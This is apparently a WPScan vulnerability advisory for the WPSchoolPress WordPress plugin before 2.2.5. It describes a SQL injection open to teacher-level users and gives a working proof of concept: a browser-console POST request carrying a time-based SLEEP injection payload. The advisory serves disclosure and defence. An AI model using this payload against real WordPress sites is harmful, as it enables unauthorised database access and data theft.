WordPress Plugin Vulnerabilities
WPSchoolPress < 2.2.5 - Teacher+ SQLi
Description
The plugin uses the WordPress esc_sql() function on a field not delimited by quotes and did not first prepare the query, leading to a SQL injection exploitable by relatively low-privilege users like Teachers.
Proof of Concept
1. Install the WPSchoolpress plugin and Import Demo Data.
2. Log in as a teacher
3. Paste the following script in the browser's console, and notice it hangs for a couple seconds, indicating the attack succeeded:
```
await fetch("http://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=sch-student", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
},
"referrer": "http://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=sch-student",
"body": "ClassID=ClassID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))abc)",
"method": "POST",
"mode": "cors"
});
```
Affects Plugins
Fixed in 2.2.5 References
CVE
YouTube Video
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Dao Xuan Hieu
Submitter
Dao Xuan Hieu
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-25 (about 7 months ago)
Added
2023-09-25 (about 7 months ago)
Last Updated
2023-09-25 (about 7 months ago)
WPScan 